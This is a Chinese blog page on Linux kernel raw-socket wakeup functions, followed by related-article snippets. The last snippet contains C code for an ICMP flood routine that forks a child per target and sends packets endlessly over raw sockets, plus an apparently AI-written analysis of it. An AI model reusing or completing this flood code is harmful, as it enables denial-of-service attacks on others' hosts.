网络子系统83_inet协议族-SOCK_RAW(四)

最新推荐文章于 2024-10-23 16:27:24 发布
最新推荐文章于 2024-10-23 16:27:24 发布
阅读量1.4k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: Linux网络子系统 文章标签: linux内核 网络内核
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/nerdx/article/details/20122515
本文介绍了rawsock数据就绪的处理过程,包括raw_recvmsg中的阻塞操作及raw_local_deliver中的数据通知机制。主要讲解了receiver_wake_function与autoremove_wake_function两个关键函数的作用与实现方式。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

//	raw sock数据就绪函数
//		raw sock在raw_recvmsg中阻塞,在raw_local_deliver通过sock->sk_data_ready通知输入数据就绪
//	步骤:
//		1.过滤感兴趣的事件
//		2.唤醒阻塞进程,并将进程从wq上取下
1.1 static int receiver_wake_function(wait_queue_t *wait, unsigned int mode, int sync,
				  void *key)
{
	unsigned long bits = (unsigned long)key;

	//POLLIN输入数据就绪
	//POLLER输出数据就绪
	if (bits && !(bits & (POLLIN | POLLERR)))
		return 0;
	//唤醒阻塞进程,并将进程从wq上取下
	return autoremove_wake_function(wait, mode, sync, key);
}

//	唤醒阻塞进程,并将进程从wq上取下
1.2 int autoremove_wake_function(wait_queue_t *wait, unsigned mode, int sync, void *key)
{
	int ret = default_wake_function(wait, mode, sync, key);

	if (ret)
		list_del_init(&wait->task_list);
	return ret;
}

linux内核协议栈 netfilter 之连接跟踪子系统AF_INET钩子函数
11-01 951
1连接跟踪子系统钩子函数概述 如《linux内核协议栈 netfilter 之 ip 层的 hook 注册概述以及 hook 的调用场景》中的1.4小结所述,为了支持连接跟踪子系统,AF_INET协议族在4个HOOK点共注册了8个钩子函数,每个HOOK点有两个。这些钩子函数可分为入口(PRE_ROUTING和LOCAL_IN)和出口(LOCAL_OUT和POST_ROUTING)两大类。 1.1数据包流向 在分析之前,我们再次回顾一下数据包在连接跟踪模块中的走向。 1.1.1 发往本地的数...
Linux内核网络协议注册与初始化:从proto_register到tcp_v4_init_sock的深度解析
数字人生
06-13 443
通过和统一管理:全局协议列表整合所有网络协议按需初始化实现协议专属初始化安全隔离:错误处理机制确保资源安全释放高效扩展:函数指针+操作表支持灵活扩展这种设计完美体现了Unix的"机制与策略分离"哲学——内核提供协议注册框架(机制),各协议实现自己的操作函数(策略),共同构建了Linux强大的网络子系统。NULL);return 0;
Linux - 网络子系统 - RAW Socket
vertor11的博客
07-10 241
引用 linux 原始套接字实现分析 Linux raw socket
深入分析原始套接口
wanghuiqing15202的专栏
06-02 1274
作者:noble 日期:2003-06-03深入分析原始套接口1.约定1.1 其中涉及到的内核代码都源自于linux kernel 2.4.7。1.2 没有其他说明情况下,我们用sk表示struct sock类型变量,用sock表示struct socket{}类型变量。1.3本文涉及到数据包在协议栈上的流程。1.4 由于作者水平有限,难免有错误指出,请联系指导。1.4联系方式:noble_shi
CAN核心RAW协议
九天小哥的专栏
10-12 2781
文章目录数据结构sock对象raw_sockPF_CAN协议族地址: sockaddr_can初始化raw_sock初始化: raw_init()socket接口实现绑定: raw_bind()使能过滤器: raw_enable_allfilters()设置socket选项: raw_setsockopt()发送数据: raw_sendmsg()接收数据: raw_recvmsg()raw_rcv() 数据结构 sock对象raw_sock struct can_frame { canid_t ca
Linux原始套接字实现分析
木牛的博客
03-01 553
并将套接字结构的ops设置为inet_sockraw_ops,将套接字结构的sk_prot设置为raw_prot。网卡驱动收到报文后在软中断上下文中由netif_receive_skb()处理,匹配是否有注册的链路层原始套接字,若匹配上就通过skb_clone()来克隆报文,并将报文交给相应的原始套接字。对于IP报文,在协议栈的ip_local_deliver_finish()函数中会匹配是否有注册的网络层原始套接字,若匹配上就通过skb_clone()克隆报文并交给相应的原始套接字来处理。
linux socket bind 内核详解,Linux内核Socket实现之------Socket绑定bind(3)
weixin_32142107的博客
04-29 921
socket系列文章都是承接第一篇socket创建,因此这里的编号和内核版本都继承了第一篇文章。2. SYSCALL_DEFINE3函数Bind系统调用通过SYSCALL_DEFINE3调用各个协议不同的bind函数,SYSCALL_DEFINE3(bind,int, fd, struct sockaddr __user *, umyaddr, int, addrlen){structsocke...
网络子系统81_inet协议族-SOCK_RAW(二)
奔跑的Linerdx的专栏
02-27 2059
// struct sock->sk_prot字段 // struct proto为插口层到传输层的接口 4.1 struct proto raw_prot = { .name = "RAW", .owner = THIS_MODULE, .close = raw_close, .destroy = raw_destroy, .connect = i
网络子系统79_inet协议族
奔跑的Linerdx的专栏
02-27 1576
// inet协议族默认支持的协议类型 // 在inet_init中,通过inet_register_protosw注册到inetsw邻接表 1.1 static struct inet_protosw inetsw_array[] = { //流类型 { .type = SOCK_STREAM, .protocol = IPPROTO_TCP, .prot =
linux网络子系统-路由子系统(1)
z20230508的博客
10-23 749
网卡驱动中断->NAPI 轮询接收报文-> __netif_receive_skb->deliver_skb-> ip_rcv -> ip_rcv_finished -> ip_local_deliver -> ip_local_deliver_finished -> tcp_v4_rcv -> tcp_v4_do_rcv -> tcp_rcv_established -> tcp_data_queue ->sk_data_ready。ip_route_input_slow函数,
Linux原始套接字实现分析---
12-07 1314
http://blog.chinaunix.net/uid-27074062-id-3388166.html 本文从IPV4协议栈原始套接字的分类入手,详细介绍了链路层和网络层原始套接字的特点及其内核实现细节。并结合原始套接字的实际应用,说明各类型原始套接字的适应范围,以及在实际使用时需要注意的问题。 一、原始套接字概述 协议栈的原始套接字从实现...
linux 原始套接字 绑定网卡,Linux原始套接字实现分析
weixin_32216791的博客
05-01 1576
之所以要转这篇文章,是因为这篇文章是我看到的同类博客中写得最好的,但非常可惜,这篇博客中只有一篇文章,没有什么收藏价值,故将其原文转载,以供今后学习查阅。本文从IPV4协议栈原始套接字的分类入手,详细介绍了链路层和网络层原始套接字的特点及其内核实现细节。并结合原始套接字的实际应用,说明各类型原始套接字的适应范围,以及在实际使用时需要注意的问题。一、原始套接字概述协议栈的原始套接字从实现上可以分为“...
recvmsg与sendmsg函数
DREAMER
05-06 5625
想对于之前的几个IO函数,recvmsg与sendmsg功能更为强大,当然用起来也更为复杂。 #include "sys/socket.h"   ssize_t recvmsg(int sockfd,  struct msghdr * msg, int flags); ssize_t sendmsg(int sockfd,  struct msghdr * msg, int
recv, recvfrom, recvmsg - 从套接口接收一个消息
weixin_34343308的博客
01-08 482
名字 recv, recvfrom, recvmsg - 从套接口接收一个消息 概要#include <sys/types.h>#include <sys/socket.h>ssize_t recv(int sockfd, void *buf, size_t len, int flags);ssize_t recvfrom(int sockfd, void *buf, si...
网络子系统23_skb常用函数
奔跑的Linerdx的专栏
09-30 4544
//分配新的skb->data,将旧的skb->data、skb_shinfo(skb)->frags、skb_shinfo(skb)->frag_list中的内容拷贝到新skb->data的连续内存空间中,释放frags或frag_list //其中frags用于支持分散聚集IO,frags_list用于支持数据分片 1.1 int __skb_linearize(struct sk_buff
网络子系统35_BPDU的发送与接收
奔跑的Linerdx的专栏
10-04 3101
//传输配置BPDU 1.1 void br_transmit_config(struct net_bridge_port *p) { struct br_config_bpdu bpdu;//配置bpdu struct net_bridge *br; if (timer_pending(&p->hold_timer)) {//如果在速率限制区间内,则设置config_pending,然
void commence_icmp (char *ip) { int i = -1, p; unsigned long resolved = 0; char *parse; if ((parse = strtok (ip, DELIMITER)) == NULL) { fw00ding = 0; return; } while ((parse != NULL) && (i++ < CHLD_MAX)) { resolved = resolve (parse); p = fork (); if (!p) { rawsock = socket (AF_INET, SOCK_RAW, RAW); if (rawsock < 0) rawsock = socket (AF_INET, SOCK_RAW, ICMP); setsockopt (rawsock, IP, IP_HDRINCL, "1", sizeof ("1")); if (resolved == -1) exit (0); while (1) icmp (resolved, 0); } #ifdef ATTACKLOG { char tmpbuf[100]; sprintf (tmpbuf, "PID %d forking (#%d), child (%d) attacks %s, ICMP\n" ,getpid (), i, p, parse); dbug (tmpbuf); } #endif pid[i] = p; parse = strtok (NULL, DELIMITER); } }
最新发布
07-17
<think>我们被要求分析一个C语言函数`commence_icmp`,该函数用于启动ICMP攻击(可能是洪水攻击)。以下是对代码的解析: 1. **函数功能**: - 该函数接收一个字符串`ip`,该字符串可能包含多个IP地址(由`DELIMITER`分隔)。 - 函数使用`strtok`分割字符串,得到每个IP地址。 - 对于每个IP地址,解析为数值(`resolved = resolve(parse)`)。 - 然后通过`fork()`创建子进程,每个子进程负责向一个IP地址持续发送ICMP包(通过循环调用`icmp(resolved, 0)`)。 2. **关键步骤**: - 分割IP字符串:使用`strtok`以`DELIMITER`为分隔符分割字符串。 - 解析IP:调用`resolve`函数将字符串IP转换为数值(可能是网络字节序的整数)。 - 创建子进程:使用`fork()`,子进程中: a. 创建原始套接字(`SOCK_RAW`),如果失败则尝试创建ICMP套接字。 b. 设置套接字选项`IP_HDRINCL`为1,表示由用户提供IP头部。 c. 如果解析IP失败(`resolved == -1`),子进程退出。 d. 进入无限循环,调用`icmp`函数发送ICMP包(攻击目标IP)。 - 父进程记录子进程PID到数组`pid`中(用于后续管理?)。 3. **日志功能**: - 如果定义了`ATTACKLOG`,则记录攻击日志,包括进程ID、子进程号、子进程PID和目标IP。 4. **注意事项**: - 该函数会创建多个子进程(最多`CHLD_MAX`个,由循环条件`i++ < CHLD_MAX`控制)。 - 每个子进程会无限制地发送ICMP包,这通常用于ICMP洪水攻击(一种拒绝服务攻击)。 5. **潜在问题**: - 如果`resolve`失败,子进程退出,但父进程仍记录了一个PID(可能为0?因为`fork`在子进程中返回0,在父进程中返回子进程PID,但这里在子进程中退出,所以父进程记录的`p`是子进程的PID,而子进程已经退出,所以这个PID可能很快失效)。 - 没有对创建子进程的数量进行有效的控制(仅通过`CHLD_MAX`限制,但未考虑系统限制)。 - 原始套接字需要特权(通常需要root权限),否则创建失败。 6. **代码缺陷**: - 错误检查不充分:例如,`fork`失败没有处理(`fork`返回负数时,子进程部分不会执行,但父进程仍会记录一个负的PID,这可能导致问题)。 - 套接字创建失败时,子进程会继续执行(如果`rawsock<0`,则创建ICMP套接字,如果再次失败,则`rawsock`为负,后续的`setsockopt`和`icmp`调用都会失败)。 7. **安全与伦理**: - 这段代码明显用于恶意攻击,未经授权使用是非法的。 根据以上分析,我们提出相关问题。 §§相关问题§§ 1. 在函数中,设置套接字选项`IP_HDRINCL`为1的作用是什么?为什么需要这个设置? 2. 如果`resolve`函数无法解析某个IP地址(返回-1),子进程会退出,那么父进程会如何处理这个子进程的退出状态? 3. 在创建原始套接字时,为什么先尝试`SOCK_RAW`协议为`RAW`(可能是一个自定义常量),失败后再尝试`ICMP`?这样设计的目的是什么? 4. 函数中使用了`fork()`创建子进程,但没有看到父进程对子进程的回收(wait)代码,这会导致僵尸进程吗?如何避免? 5. 在网络安全防御中,如何检测和防御此类ICMP洪水攻击?</think>这段代码实现了一个ICMP洪水攻击(ICMP Flood)的多进程启动函数,以下是关键分析: 1. **核心功能**: - 通过`strtok`分割输入IP字符串(支持多目标攻击) - 对每个目标IP调用`resolve()`解析为数值格式 - 使用`fork()`创建子进程实施攻击 - 子进程创建原始套接字并设置`IP_HDRINCL`(用户自定义IP头) - 子进程进入死循环调用`icmp()`发送攻击包 2. **攻击特征**: ```c while (1) icmp(resolved, 0); // 无限循环发送ICMP包 ``` - 无间隔持续攻击(典型DoS攻击模式) - 使用原始套接字绕过系统限制 - 通过`IP_HDRINCL`允许伪造源IP(隐藏攻击源) 3. **进程管理**: - 父进程记录子进程PID到`pid[]`数组 - 通过`CHLD_MAX`限制最大子进程数 - 未实现子进程监控/回收机制(可能导致僵尸进程) 4. **日志模块**: ```c #ifdef ATTACKLOG sprintf(tmpbuf, "PID %d...attacks %s, ICMP\n", getpid(), p, parse); dbug(tmpbuf); #endif ``` - 编译时可选的攻击日志功能 - 记录攻击目标、进程ID等敏感信息 5. **安全缺陷**: - 无错误处理(如`socket()`失败继续执行) - 未验证IP有效性(`resolve()`失败直接退出) - 特权要求(原始套接字需root权限)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值